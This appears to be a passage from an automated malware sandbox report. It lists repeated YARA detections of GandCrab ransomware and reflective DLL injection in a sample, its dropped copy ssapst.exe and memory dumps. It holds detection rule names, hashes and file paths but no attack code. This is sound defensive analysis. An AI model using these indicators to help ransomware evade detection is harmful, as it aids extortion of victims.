Source: 8.3.ssapst.exe.30f0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 8.3.ssapst.exe.30f0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 8.3.ssapst.exe.30f0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 2.3.ssapst.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.3.ssapst.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 2.3.ssapst.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 14.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 14.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 26.3.ssapst.exe.3830000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 26.3.ssapst.exe.3830000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 26.3.ssapst.exe.3830000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 8.3.ssapst.exe.30f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 8.3.ssapst.exe.30f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 8.3.ssapst.exe.30f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 34.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 34.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 34.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 33.3.ssapst.exe.3d30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 33.3.ssapst.exe.3d30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 33.3.ssapst.exe.3d30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 4.3.ssapst.exe.38c0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.3.ssapst.exe.38c0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 4.3.ssapst.exe.38c0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 31.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 31.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 31.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 30.3.ssapst.exe.2fc0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 30.3.ssapst.exe.2fc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 30.3.ssapst.exe.2fc0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 6.3.ssapst.exe.2f70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 6.3.ssapst.exe.2f70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 6.3.ssapst.exe.2f70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 14.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 14.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 33.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 33.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 33.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 33.3.ssapst.exe.3d30000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 33.3.ssapst.exe.3d30000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 33.3.ssapst.exe.3d30000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 2.3.ssapst.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.3.ssapst.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 2.3.ssapst.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 2.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 2.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 4.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 4.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 4.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 4.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 15.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 15.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 15.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 26.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 26.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 26.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 14.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 14.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 31.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 31.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 31.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 33.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 33.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 33.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 2.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 2.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 32.3.ssapst.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 32.3.ssapst.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 32.3.ssapst.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 32.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 32.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 32.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 18.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 18.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 18.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 6.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 6.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 6.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 26.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 26.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 26.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 34.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 34.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 34.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, type: DROPPED	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, type: DROPPED	Matched rule: Gandcrab Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, type: DROPPED	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs

Source: wThN5MTIsw.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: wThN5MTIsw.exe, type: SAMPLE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: wThN5MTIsw.exe, type: SAMPLE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: wThN5MTIsw.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: wThN5MTIsw.exe, type: SAMPLE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: wThN5MTIsw.exe, type: SAMPLE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 34.3.ssapst.exe.32a0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 34.3.ssapst.exe.32a0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 34.3.ssapst.exe.32a0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 34.3.ssapst.exe.32a0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 34.3.ssapst.exe.32a0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 32.3.ssapst.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 32.3.ssapst.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 32.3.ssapst.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 32.3.ssapst.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 32.3.ssapst.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 18.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 18.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 18.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 18.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 18.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.3.wThN5MTIsw.exe.3170000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.3.wThN5MTIsw.exe.3170000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.3.wThN5MTIsw.exe.3170000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.3.wThN5MTIsw.exe.3170000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.3.wThN5MTIsw.exe.3170000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 35.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
